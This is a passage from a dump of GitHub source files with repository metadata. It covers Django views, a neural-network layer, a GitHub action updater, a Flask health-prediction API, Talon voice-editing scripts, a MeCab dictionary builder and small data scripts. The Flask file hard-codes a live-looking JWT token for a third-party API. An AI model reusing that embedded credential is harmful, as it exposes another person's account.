1\n\n\nprint(time)\nprint(cnt[-2])","repo_name":"olive-su/1day_1Algorithm","sub_path":"22.06_PS/0611_치즈.py","file_name":"0611_치즈.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9633571859","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\n\nfrom account.models import Follow, Profile\nfrom post.models import Post, Like\n\n\n@login_required\ndef viewpost(request):\n following_list = Follow.objects.filter(follower=request.user)\n feed = Post.objects.filter(author__in=following_list.values_list('following'))\n liked_post = Like.objects.filter(user=request.user)\n liked_post_list = liked_post.values_list('post', flat=True)\n return render(request, 'post/ViewPost.html', context={'feed': feed, 'liked_post_list': liked_post_list})\n\n\n@login_required\ndef like(request, pk):\n post = Post.objects.get(pk=pk)\n already_like = Like.objects.filter(post=post, user=request.user)\n if not already_like:\n liked_post = Like(post=post, user=request.user)\n liked_post.save()\n return redirect(reverse('viewpost'))\n\n\n@login_required\ndef unlike(request, pk):\n post = Post.objects.get(pk=pk)\n already_like = Like.objects.filter(post=post, user=request.user)\n already_like.delete()\n return redirect(reverse('viewpost'))\n","repo_name":"Rolleex/Social","sub_path":"social/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16864431829","text":"import numpy as np\n\n# Class for layers in neural network\nclass Neural_Layer(object):\n '''\n Structure of data\n 
n_connections As many as neurons in previous layer\n n_neurons Neurons in actual layer\n activation_f Activation function for neurons in layer\n bias As many as neurons in actual layer\n '''\n def __init__(self, n_connections, n_neurons, activation_f):\n self.activation_f = activation_f\n # * 2 - 1 is used to get values in range (-1, 1)\n self.bias = np.random.rand(1, n_neurons) * 2 - 1\n self.weights = np.random.rand(n_connections, n_neurons) * 2 - 1 \n","repo_name":"RamiroG8k/NN-Dynamic-AF","sub_path":"neural_layer.py","file_name":"neural_layer.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24694626223","text":"__author__ = \"Vanessa Sochat\"\n__copyright__ = \"Copyright 2022, Vanessa Sochat\"\n__license__ = \"MPL 2.0\"\n\n\nimport abc\nimport importlib\nimport inspect\nimport os\nimport re\nfrom collections.abc import Mapping\n\nimport jsonschema\nimport requests\n\nfrom action_updater.logger import logger\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\nclass UpdaterFinder(Mapping):\n \"\"\"\n Create a cache of available updaters.\n \"\"\"\n\n _updaters = {}\n\n def __init__(self):\n \"\"\"\n Instantiate an updater\n \"\"\"\n self.collection_path = os.path.join(here, \"updaters\")\n self.load()\n\n def __getitem__(self, name):\n return self._updaters.get(name)\n\n def __iter__(self):\n return iter(self._updaters)\n\n def __len__(self):\n return len(self._updaters)\n\n def load(self):\n \"\"\"\n Load new updaters\n \"\"\"\n self._updaters = self._load_updaters()\n\n def _load_updaters(self):\n \"\"\"\n Load updaters based on listing folders in the collection.\n \"\"\"\n lookup = {}\n for name in os.listdir(self.collection_path):\n updater_dir = os.path.join(self.collection_path, name)\n updater_file = os.path.join(updater_dir, \"update.py\")\n\n # Skip files in collection folder\n if os.path.isfile(updater_dir):\n continue\n\n # Continue if the file doesn't exist\n if not os.path.exists(updater_file):\n logger.debug(\"%s does not appear to have an update.py, skipping.\" % updater_dir)\n continue\n\n # The class name means we split by underscore, capitalize, and join\n class_name = \"\".join([x.capitalize() for x in name.split(\"_\")]) + \"Updater\"\n module = \"action_updater.main.updaters.%s.update\" % name\n\n # Not instantiated - will be instantiated for a specific action\n lookup[name] = getattr(importlib.import_module(module), class_name)\n return lookup\n\n\nclass UpdaterBase:\n\n name = \"updater\"\n description = \"An abstract base updater.\"\n date_time_format = \"%Y-%m-%dT%H:%M:%S%z\"\n\n # The default updater is not intended for static files\n static_files = False\n\n def __init__(self, token, settings=None):\n self._data = {}\n self.headers = {}\n self.update_token(token)\n self.count = 0\n\n # Each updater can ship its own settings schema\n if not hasattr(self, \"schema\"):\n self.schema = {}\n\n self.validate_settings(settings)\n\n @abc.abstractmethod\n def detect(self, *args, **kwargs):\n pass\n\n @property\n def slug(self):\n return re.sub(\"(-|_)\", \"\", self.name)\n\n @property\n def title(self):\n return self.name.capitalize()\n\n def validate_settings(self, settings):\n \"\"\"\n If settings are provided (and the updater has a schema) ensure we validate.\n \"\"\"\n self.global_settings = settings or {}\n if self.global_settings and self.schema:\n jsonschema.validate(self.settings, schema=self.schema)\n\n @property\n def settings(self):\n \"\"\"\n Get 
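Note: the updater discovery above derives a class name from a folder name by capitalising underscore-separated parts and appending "Updater"; the convention in miniature (hypothetical folder name):

    name = "git_release"
    class_name = "".join(part.capitalize() for part in name.split("_")) + "Updater"
    assert class_name == "GitReleaseUpdater"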
settings specific to updater\n \"\"\"\n return self.global_settings.updaters.get(self.name, {})\n\n def update_token(self, token=None):\n \"\"\"\n Set token and headers, if found\n \"\"\"\n self.token = token or os.environ.get(\"GITHUB_TOKEN\")\n if self.token:\n self.headers[\"Authorization\"] = \"token %s\" % self.token\n\n @property\n def classpath(self):\n return os.path.dirname(inspect.getfile(self.__class__))\n\n def get_releases(self, repo):\n \"\"\"\n Get the lateset release of an action (under flux-framework)\n \"\"\"\n return self.get_request(f\"{self.global_settings.github_api}/repos/{repo}/releases\")\n\n def get_tags(self, repo):\n \"\"\"\n Get the lateset tags for a repository\n \"\"\"\n return self.get_request(f\"{self.global_settings.github_api}/repos/{repo}/git/refs/tags\")\n\n def get_tags_lookup(self, repo):\n \"\"\"\n This isn't required to be sploot out, but it's easier to debug / read if necessary\n \"\"\"\n tags = {}\n for t in self.get_tags(repo):\n if \"ref\" not in t or \"refs/tags\" not in t[\"ref\"]:\n continue\n tags[re.sub(\"refs/tags/\", \"\", t[\"ref\"])] = t\n return tags\n\n def get_request(self, url):\n \"\"\"\n Perform a GitHub get request (assume pagination)\n \"\"\"\n response = requests.get(url, headers=self.headers, params={\"per_page\": 100})\n\n try:\n response.raise_for_status()\n except Exception:\n # Set a warning about limtis without tokens!\n if not self.token:\n logger.exit(\"export GITHUB_TOKEN to increase API limits.\")\n\n # latest release should be first in this set\n return response.json()\n","repo_name":"vsoch/action-updater","sub_path":"action_updater/main/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"16669075960","text":"import numpy as np\nfrom flask import Flask, abort, jsonify, request\nimport pickle as pickle\n\nimport numpy as np\nimport base64\n\nfrom flask import Flask, request, render_template, make_response\nfrom sklearn.externals import joblib\nfrom io import BytesIO\nfrom skimage import io as skio\nfrom skimage.transform import resize\nfrom flask import Flask, render_template\nimport requests\nimport json\nimport sys\n##############################################\n###-CARREGO MEU MODELO DE APRENDIZAGEM AQUI-##\n##############################################\nmy_knn = pickle.load(open('analytics_folder/knn.pkl', 'rb'))\n\ndiabetes_model = pickle.load(open('analytics_folder/diabetes.pkl', 'rb')) \napp = Flask(__name__)\n\n##############################################\n################ -API HOME - #################\n##############################################\n@app.route('/home')\n\ndef home():\n return (\"Página Ínicial\")\n\n###############################################\n############## -ROTA SWAGGER - ################\n###############################################\n\n\n \n###############################################\n# ROTA (POST) QUE RECEBE OS ATRIBUTOS ESPERADOS DO MODELO DE APRENDIZAGEM DEFINIDO E RETORNA A PREDIÇÃO FEITA POR ELE\n@app.route('/pressao', methods=['POST'])\n\ndef make_predict(): #10.0.0.102\n if request.method == 'POST':\n try:\n data = request.get_json(force=True)\n predict_request = [data['Batimentos'], data['Calorias']]\n \n except ValueError:\n return jsonify(\"Por favor, coloque um valor para batimentos e calorias: \")\n \n predict_request = np.array(predict_request)\n predict_request = predict_request.reshape(1,-1)\n\n y_hat = 
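Note (translation): the Portuguese comments and strings in srv.py read, in English: "CARREGO MEU MODELO DE APRENDIZAGEM AQUI" = "I load my learning model here"; "Página Ínicial" (sic, "Inicial") = "Home page"; "Por favor, coloque um valor para batimentos e calorias" = "Please provide a value for heartbeats and calories"; the /pressao results mean "Your blood pressure is normal / very low / very high". The user-facing strings are left untranslated since clients may depend on them.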
my_knn.predict(predict_request) #retorna o resulta em JSON\n\n output = [y_hat[0]]\n \n #return jsonify(my_knn.predict(predict_request).tolist()) #Transforma o resultado JSON em uma lista\n \n def result(m):\n if m[0] == 0:\n return \"Sua Pressao esta normal\"\n \n elif m[0] == 1:\n return \"Sua Pressao esta muito Baixa\"\n \n elif m[0] == 2:\n return \"Sua Pressao esta muito Alta\"\n \n output = result(output)\n return jsonify(results=output)\n###############################################\n\n\n# ROTA (POST) QUE RECEBE OS ATRIBUTOS ESPERADOS DO MODELO DE APRENDIZAGEM DEFINIDO E RETORNA A PREDIÇÃO FEITA POR ELE\n@app.route('/diabetes', methods=['POST'])\n\ndef make_predict2(): #10.0.0.102\n if request.method == 'POST':\n try:\n data = request.get_json(force=True)\n #predict_request = [data['Pregnancies'], data['Glucose'], data['BloodPressure'], data['SkinThickness'], data['Insulin'], data['BMI'], data['DiabetesPedigreeFunction'], data['Age']]\n predict_request = [data['Glucose'], data['BloodPressure'], data['Insulin'], data['BMI'], data['Age']]\n \n except ValueError:\n return jsonify(\"Valores inadequados! \")\n \n predict_request = np.array(predict_request)\n predict_request = predict_request.reshape(1,-1)\n\n y_hat2 = diabetes_model.predict(predict_request) #retorna o resulta em JSON\n\n output2 = [y_hat2[0]]\n \n #return jsonify(my_knn.predict(predict_request).tolist()) #Transforma o resultado JSON em uma lista\n \n def result(m):\n if m[0] == 0:\n return \"Sem Diabetes\"\n \n elif m[0] == 1:\n return \"Diabetes\"\n \n \n output2 = result(output2)\n return jsonify(results=output2)\n###############################################\n\n\n# A route to return all of the available entries in our catalog.\n@app.route('/hanUser', methods=['GET'])\ndef api_all():\n\tparams = {\n 'api_key': '{eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJfaWQiOiI1YWNjYjZkYTM3MzNjZDAwMTQ5MTZjNTAifQ.1gJH3Y0u9vmXcYQsMx-OmqqFL2rQfTZlYF9L4r9bXO0}',\n }\n\tr = requests.get('https://haniot-api.herokuapp.com/api/v1/measurements/types/3?period=3w', headers={'Authorization': 'JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJfaWQiOiI1YWNjYjZkYTM3MzNjZDAwMTQ5MTZjNTAifQ.1gJH3Y0u9vmXcYQsMx-OmqqFL2rQfTZlYF9L4r9bXO0'})\n\t#r = get_json(r.text)\n\tr = r.text\n\n\treturn r\n\n###############################################\n################# -TESTES- ####################\n###############################################\n@app.route('/diabeteTeste')\ndef teste():\n\twith app.test_client() as c:\n\t rv = c.post('/diabetes', json={\n\t 'Glucose': 999, 'BloodPressure': 999, 'Insulin': 100, 'BMI': 14, 'Age': 11\n\t \n\t })\n\t print(rv, file=sys.stderr)\n\t return rv\n\n@app.route('/pressaoTeste')\ndef teste2():\n\twith app.test_client() as c:\n\t rv = c.post('/pressao', json={\n\t 'Batimentos': 35, 'Calorias': 35\n\t \n\t })\n\t print(rv, file=sys.stderr)\n\t return rv\n\n@app.route('/aquisicaoTeste')\ndef teste3():\n\twith app.test_client() as c:\n\t resp = c.get('/hanUser')\n\t print(resp, file=sys.stderr)\n\t return resp\n############################################################\n\nif __name__ == '__main__':\n\tapp.run(host= '0.0.0.0', port=33)","repo_name":"EduBrQ/Nutes-MachineLearning","sub_path":"srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44278439624","text":"# https://github.com/JonathanNickerson/talon_voice_user_scripts\n\nimport time\n\nimport talon.clip as clip\nfrom talon.voice import Key, press, 
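Note: an illustrative client call against the /pressao route defined above (host/port mirror app.run(host='0.0.0.0', port=33); the payload shape follows the /pressaoTeste test). Separately, the hard-coded JWT in /hanUser is a leaked credential and belongs in configuration, not source.

    import requests

    resp = requests.post("http://localhost:33/pressao",
                         json={"Batimentos": 80, "Calorias": 2000})
    print(resp.json())  # e.g. {"results": "Sua Pressao esta normal"}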
Str, Context\nfrom ..utils import (\n parse_words,\n join_words,\n is_not_vim,\n numeral_list,\n extract_num_from_m,\n)\n\nctx = Context(\"generic_editor\", func=is_not_vim)\nctx.set_list(\"n\", numeral_list)\n\n\ndef find_next(m):\n press(\"cmd-f\")\n Str(str(m.dgndictation[0]._words[0]))(None)\n press(\"escape\")\n\n\ndef find_previous(m):\n press(\"left\")\n press(\"cmd-f\")\n Str(str(m.dgndictation[0]._words[0]))(None)\n press(\"cmd-shift-g\")\n press(\"escape\")\n\n\n# jcooper-korg from talon slack\ndef select_text_to_left_of_cursor(m):\n words = parse_words(m)\n if not words:\n return\n old = clip.get()\n key = join_words(words).lower()\n press(\"shift-home\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"right\", wait=2000)\n text_left = clip.get()\n clip.set(old)\n result = text_left.find(key)\n if result == -1:\n return\n # cursor over to the found key text\n for i in range(0, len(text_left) - result):\n press(\"left\", wait=0)\n # now select the matching key text\n for i in range(0, len(key)):\n press(\"shift-right\")\n\n\n# jcooper-korg from talon slack\ndef select_text_to_right_of_cursor(m):\n words = parse_words(m)\n if not words:\n return\n key = join_words(words).lower()\n old = clip.get()\n press(\"shift-end\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"left\", wait=2000)\n text_right = clip.get()\n clip.set(old)\n result = text_right.find(key)\n if result == -1:\n return\n # cursor over to the found key text\n for i in range(0, result):\n press(\"right\", wait=0)\n # now select the matching key text\n for i in range(0, len(key)):\n press(\"shift-right\")\n\n\nalphanumeric = \"abcdefghijklmnopqrstuvwxyz0123456789_\"\n\n\ndef big_word_neck(m):\n return word_neck(m, valid_characters=set(alphanumeric) | set(\"/\\\\-_.>=<\"))\n\n\ndef small_word_neck(m):\n return word_neck(m, valid_characters=set(alphanumeric) - set(\"_\"))\n\n\ndef word_neck(m, valid_characters=alphanumeric):\n word_index = extract_num_from_m(m, 1)\n\n old = clip.get()\n press(\"shift-right\", wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"shift-left\", wait=2000)\n current_highlight = clip.get()\n if len(current_highlight) > 1:\n press(\"right\", wait=2000)\n press(\"shift-end\", wait=2000)\n time.sleep(0.25)\n press(\"cmd-c\", wait=2000)\n press(\"left\", wait=2000)\n time.sleep(0.25)\n text_right = clip.get().lower()\n clip.set(old)\n\n is_word = [character in valid_characters for character in text_right]\n word_count = 1\n i = 0\n while i < (len(is_word) - 1) and not is_word[i]:\n i += 1\n\n # print(\"a start\", i)\n\n while i < (len(is_word) - 1) and word_count < word_index:\n # print(i, is_word[i], word_count, word_index)\n if not is_word[i] and is_word[i + 1]:\n word_count += 1\n i += 1\n # warning: this is a hack, sorry\n # print(\"i\", i)\n if i == 1 and is_word[0]:\n i = 0\n start_position = i\n # print(text_right[start_position:])\n while i < len(is_word) and is_word[i]:\n i += 1\n end_position = i\n\n # print(start_position, end_position)\n # cursor over to the found word\n for i in range(0, start_position):\n press(\"right\", wait=0)\n # now select the word\n for i in range(0, end_position - start_position):\n press(\"shift-right\")\n\n\ndef big_word_prev(m):\n return word_prev(m, valid_characters=set(alphanumeric) | set(\"/\\\\-_.>=<\"))\n\n\ndef small_word_prev(m):\n return word_prev(m, valid_characters=set(alphanumeric) - set(\"_\"))\n\n\ndef word_prev(m, valid_characters=alphanumeric):\n word_index = extract_num_from_m(m, 1)\n\n old = clip.get()\n press(\"shift-right\", 
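Note: the selection helpers above share one clipboard round-trip idiom -- preserve the user's clipboard, copy the region of interest so the script can inspect it, then restore it. The shape of the idiom, excerpted with comments on the talon.clip calls used in this file:

    old = clip.get()      # preserve the user's clipboard
    press("shift-end")    # select the text of interest
    press("cmd-c")        # copy it so the script can read it
    text = clip.get()
    clip.set(old)         # restore the clipboard before continuing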
wait=2000)\n press(\"cmd-c\", wait=2000)\n press(\"shift-left\", wait=2000)\n current_highlight = clip.get()\n if len(current_highlight) > 1:\n press(\"left\", wait=2000)\n press(\"shift-home\", wait=2000)\n time.sleep(0.25)\n press(\"cmd-c\", wait=2000)\n press(\"right\", wait=2000)\n time.sleep(0.25)\n text_right = clip.get().lower()\n clip.set(old)\n\n text_right = list(reversed(text_right))\n\n is_word = [character in valid_characters for character in text_right]\n word_count = 1\n i = 0\n while i < (len(is_word) - 1) and not is_word[i]:\n i += 1\n\n while i < (len(is_word) - 1) and word_count < word_index:\n # print(i, is_word[i], word_count, word_index)\n if not is_word[i] and is_word[i + 1]:\n word_count += 1\n i += 1\n start_position = i\n # print(text_right[start_position:])\n while i < len(is_word) and is_word[i]:\n i += 1\n end_position = i\n\n # print(start_position, end_position, text_right[start_position:end_position])\n # cursor over to the found word\n for i in range(0, start_position):\n press(\"left\", wait=0)\n # now select the word\n for i in range(0, end_position - start_position):\n press(\"shift-left\")\n\n\ndef word_number(m):\n # lefty\n press(\"cmd-left\")\n word_neck(m)\n\n\nctx.keymap(\n {\n # meta\n \"(save it | sage)\": Key(\"cmd-s\"),\n \"(undo it | dizzle)\": Key(\"cmd-z\"),\n \"(redo it | rizzle)\": Key(\"cmd-shift-z\"),\n # clipboard\n \"(clip cut | snatch)\": Key(\"cmd-x\"),\n \"(clip copy | stoosh)\": Key(\"cmd-c\"),\n \"(clip paste | spark)\": Key(\"cmd-v\"),\n # motions\n \"(go word left | fame)\": Key(\"alt-left\"),\n \"(go word right | fish)\": Key(\"alt-right\"),\n \"(go line after end)\": Key(\"cmd-right space\"),\n \"(go line start | lefty)\": Key(\"cmd-left\"),\n \"(go line end | ricky)\": Key(\"cmd-right\"),\n \"(go line before end | smear)\": Key(\"cmd-right left\"),\n # insertions\n \"([insert] line break | sky turn)\": Key(\"shift-enter\"),\n \"([insert] new line below | slap)\": Key(\"cmd-right enter\"),\n \"([insert] new line above)\": Key(\"ctrl-a cmd-left enter up\"),\n \"([insert] duplicate line | jolt)\": Key(\n \"ctrl-a cmd-left shift-down cmd-c down cmd-v\"\n ),\n # deleting\n \"(delete around this | slurp)\": Key(\"backspace delete\"),\n \"(delete line left | snip left)\": Key(\"shift-cmd-left delete\"),\n \"(delete line right | snip right)\": Key(\"shift-cmd-right delete\"),\n \"(delete [this] line)\": Key(\"shift-cmd-right delete delete ctrl-a cmd-left\"),\n \"(delete word left | steffi | carmex)\": Key(\"alt-backspace\"),\n \"(delete word right | stippy | kite)\": Key(\"alt-delete\"),\n \"(delete [this] word | slurpies)\": Key(\"alt-backspace alt-delete\"),\n # selecting\n \"(select find right | crew) \": select_text_to_right_of_cursor,\n \"(select find left | trail) \": select_text_to_left_of_cursor,\n \"(select this word | word this)\": Key(\"alt-right shift-alt-left\"),\n \"(select this line | shackle)\": Key(\"cmd-right shift-cmd-left\"),\n \"(select above | shift home)\": Key(\"shift-home\"),\n \"(select up | shreep)\": Key(\"shift-up\"),\n \"(select down | shroom)\": Key(\"shift-down\"),\n \"(select way down | shroomway)\": Key(\"cmd-shift-down\"),\n \"(select way up | shreepway)\": Key(\"cmd-shift-up\"),\n \"(select all | olly | ali)\": Key(\"cmd-a\"),\n \"(select left | shrim | shlicky)\": Key(\"shift-left\"),\n \"(select right | shrish | shricky)\": Key(\"shift-right\"),\n \"(select word number {generic_editor.n}* above | wordpreev {generic_editor.n}*)\": word_prev,\n \"big word preev {generic_editor.n}*\": 
big_word_prev,\n        \"big word neck {generic_editor.n}*\": big_word_neck,\n        \"small word preev {generic_editor.n}*\": small_word_prev,\n        \"small word neck {generic_editor.n}*\": small_word_neck,\n        \"(select word number {generic_editor.n}* below | wordneck {generic_editor.n}*)\": word_neck,\n        \"word {generic_editor.n}\": word_number,\n        \"(select word left | scram)\": Key(\"alt-shift-left\"),\n        \"(select word right | scrish)\": Key(\"alt-shift-right\"),\n        \"(select line left | lecksy)\": Key(\"cmd-shift-left\"),\n        \"(select line right | ricksy)\": Key(\"cmd-shift-right\"),\n    }\n)\n","repo_name":"weyrick/weyrick-talon","sub_path":"community/misc/generic_editor.py","file_name":"generic_editor.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13228043925","text":"# Exercise 1 - Build a structure that asks the user for the day of the week.\n# If the day is Sunday or Saturday, print \"Hoje e dia de descanso!\" (today is a\n# rest day) on the screen; otherwise print \"Voce precisa trabalhar!\" (you need to work).\n\n\ndia = str(input(\"Digite o dia da semana?\")).upper()\n\nif dia == \"DOMINGO\" or dia == \"SABADO\": \n    print(\"Hoje e dia de descanso!\")\n    \nelse:\n    print(\"Voce precisa trabalhar!\")\n    \n    \n    \n    ","repo_name":"llorenzo-dev/Thonny","sub_path":"DSA - Python-Cap 3-Exercícios 1.py","file_name":"DSA - Python-Cap 3-Exercícios 1.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28876683142","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pygtrie\nimport argparse\nimport codecs\nimport sys\nimport os\nimport shutil\nimport subprocess\n\n\ndef get_trie_from_freqdata(freq_path):\n    sys.stderr.write('Get freq...\\n')\n    tr = pygtrie.CharTrie()\n    with codecs.open(freq_path, 'r', 'utf-8') as inf:\n        for idx, line in enumerate(inf):\n            if idx % 1000 == 0:\n                sys.stderr.write('\\r%d' % idx)\n            items = line[:-1].split('\\t')\n            if len(items) != 2:\n                continue\n            word = items[0]\n            freq = int(items[1])\n            tr[word] = freq\n    sys.stderr.write('\\n done!\\n')\n    return tr\n\n\ndef _make_matrix(in_path, out_path, target=0):\n    sys.stderr.write('Make matrix...\\n')\n    with codecs.open(in_path, 'r', 'utf-8') as inf, \\\n            codecs.open(out_path, 'w', 'utf-8') as outf:\n        for lid, line in enumerate(inf):\n            if lid == 0:\n                outf.write(line)\n                continue\n            elif lid % 1000 == 0:\n                sys.stderr.write('\\r%d' % lid)\n\n            items = line.split(' ')\n            if len(items) != 3:\n                raise SyntaxError\n            lid, rid, cost = [int(val) for val in items]\n\n            # force the connection cost to/from BOS/EOS (id=0) to zero\n            if lid == 0 or rid == 0:\n                cost = 0\n            outf.write('%d %d %d\\n' % (lid, rid, cost))\n    sys.stderr.write('\\n done!\\n')\n\n\ndef _make_lex(freqs, lex_in_path, lex_out_path):\n    sys.stderr.write('Make lex.csv...\\n')\n    with codecs.open(lex_in_path, 'r', 'utf-8') as inf, \\\n            codecs.open(lex_out_path, 'w', 'utf-8') as outf:\n        for idx, line in enumerate(inf):\n            surf = line[:line.find(',')]\n            freq = freqs.get(surf)\n            if freq is None:  # drop low-frequency words\n                continue\n\n            # skip symbols, supplementary symbols, and interjections (UniDic POS values)\n            fields = line.split(',')\n            if len(fields) >= 5 and fields[4] in ['記号', '補助記号', '感動詞']:\n                continue\n\n            outf.write(line[:-1])  # without \\n\n            outf.write(\",%d\\n\" % freq)  # append the frequency as a feature\n\n\ndef operation(freq_path, unidic_path, out_path, command):\n    out_src_path = os.path.join(out_path, 'src')\n    out_bin_path = os.path.join(out_path, 'bin')\n    os.makedirs(out_src_path, exist_ok=True)\n    os.makedirs(out_bin_path, 
exist_ok=True)\n\n    sys.stderr.write('Copy...\\n')\n    shutil.copy(os.path.join(unidic_path, 'dicrc'), out_src_path)\n    shutil.copy(os.path.join(unidic_path, 'dicrc'), out_bin_path)\n    fnames = ['char.def', 'feature.def', 'left-id.def',\n              'model.def', 'rewrite.def', 'right-id.def', 'unk.def']\n    for fname in fnames:\n        shutil.copy(os.path.join(unidic_path, fname), out_src_path)\n\n    lex_in_path = os.path.join(unidic_path, 'lex.csv')\n    lex_out_path = os.path.join(out_src_path, 'lex.limited.csv')\n    freqs = get_trie_from_freqdata(freq_path)\n    _make_lex(freqs, lex_in_path, lex_out_path)\n\n    _make_matrix(os.path.join(unidic_path, 'matrix.def'),\n                 os.path.join(out_src_path, 'matrix.def'))\n\n    mycmd = '%s -f utf8 -t utf8 -d %s -o %s' %\\\n        (command, out_src_path, out_bin_path)\n    sys.stderr.write('Exec\\n %s\\n' % mycmd)\n    subprocess.check_output(mycmd, shell=True)\n    sys.stderr.write('\\n done!\\n')\n\n\ndef get_opts():\n    oparser = argparse.ArgumentParser()\n    oparser.add_argument(\"--unidic\", \"-u\", required=True)\n    oparser.add_argument(\"--freq\", required=True)\n    oparser.add_argument(\"--output\", \"-o\", required=True)\n    oparser.add_argument(\"--command\",\n                         default=os.path.expanduser(\n                             '~/local/libexec/mecab/mecab-dict-index'))\n    return oparser.parse_args()\n\n\ndef main():\n    opts = get_opts()\n    operation(opts.freq, opts.unidic, opts.output, opts.command)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"shirayu/MA2018-ginata","sub_path":"convert_unidic.py","file_name":"convert_unidic.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"25914422860","text":"# NOTE: assumed imports for this fragment (FastAPI + openpyxl); `logger` and\n# API_CONFIG_EXCEL_FILE_PATH come from elsewhere in the original project.\nfrom datetime import date\n\nfrom fastapi import HTTPException, status\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import PatternFill\n\n\ndef add_excel_template_to_file(outgoing_filename, user):\n    if (outgoing_filename==\"\"):\n        raise HTTPException(\n            status_code=status.HTTP_404_NOT_FOUND,\n            detail=str(\"Excel file not found\"),\n        )\n    else:\n        wb_orginal = load_workbook(f'{outgoing_filename}')\n        if (wb_orginal==\"\"):\n            raise HTTPException(\n                status_code=status.HTTP_404_NOT_FOUND,\n                detail=str(\"Error in Work book Loading\"),\n            )\n        else:\n            try:\n                wb_templet=load_workbook(f'{API_CONFIG_EXCEL_FILE_PATH}/LeadZen_template.xlsx')\n                index_sheet = wb_templet.get_sheet_by_name('Index')\n                data = wb_orginal.get_sheet_by_name('Sheet1')\n                financial_advisor = wb_templet.get_sheet_by_name('Financial Advisor')\n                number_of_rows = data.max_row\n                number_of_col = data.max_column\n                for i in range(1, number_of_rows + 1):\n                    for j in range(1, number_of_col + 1):\n                        c = data.cell(row=i, column=j)\n                        financial_advisor.cell(row=i+5, column=j).value = c.value\n                for rows in financial_advisor.iter_rows(min_row=6, max_row=6, min_col=1):\n                    for cell in rows:\n                        cell.fill = PatternFill(fgColor=\"B4C9D9\", patternType=\"solid\")\n                no_of_record=index_sheet['J18']\n                requested_by = index_sheet['J20']\n                request_date = index_sheet['J22']\n                no_of_record.value=number_of_rows-1\n                requested_by.value=user.username\n                today = date.today()\n                request_date.value=today.strftime(\"%d/%m/%Y\")\n                wb_templet.save(outgoing_filename)\n                return outgoing_filename\n            except Exception as e:\n                logger.critical(\"Error>>>\" + str(e))","repo_name":"ShivPatel9211/python-scripts","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31363007191","text":"#!../../anaconda2/bin/python\n\n\nimport os\n#import shutil\n#import random\n#import re\n#import json\n#import pickle\nimport reader\nimport 
label\n\ndir1 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/4-10/Adjudication/\"\ndir2 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/11-50/Adjudication/\"\ndir3 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/51-100/Adjudication/\"\ndir4 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/101-218/Adjudication/\"\ndir5 = \"/uufs/chpc.utah.edu/common/home/conway-group1/TRIANGULUM_ANNOTATION/AnnotationDataset/userBasedData/218-1000/Adjudication/\"\n\ndirList = [dir1,dir2,dir3,dir4,dir5]\n\nallAnotList = []\nnumFiles = 0\nnumRelationship = 0\nnumAnotFile = 0\nnumNoneFile = 0\nnumNoneRelFile = 0\n\nclassLabelDic = label.classLabel()\nrelList = []\nMJ = 0\nTOBACCO = 0\nVAPING = 0\nCESSATION = 0\nfileClassLabelList = []\nfor d in dirList:\n\tfor filename in os.listdir(d):\n\t\tanotDicList = reader.annotFileReader_relationship(d+filename)\n\t\tanotSet = set()\n\t\tif anotDicList:\n\t\t\tfor t in anotDicList:\n\t\t\t\tif t['relationList']:\n\t\t\t\t\tfor r in t['relationList']:\n\t\t\t\t\t\trelList.append(r['relation'])\n\n\t\t\t\tanotSet.add(t['class'])\n\t\tpostAnnot = []\n\t\tfor l in list(anotSet):\n\t\t\tpostAnnot = postAnnot+classLabelDic[l]\n\n\t\tfileClassLabelList.append(list(set(postAnnot)))\n\n\nimport collections\ncounter = collections.Counter(relList)\nprint(counter)\n\nfor f in fileClassLabelList:\n\tif 'MJ' in f:\n\t\tMJ = MJ+1\n\tif 'VAPING' in f:\n\t\tVAPING = VAPING+1\n\tif 'CESSATION' in f:\n\t\tCESSATION = CESSATION+1\n\tif 'TOBACCO' in f:\n\t\tTOBACCO = TOBACCO+1\n\nprint('MJ',MJ, 'VAPING', VAPING, 'CESSATION', CESSATION, 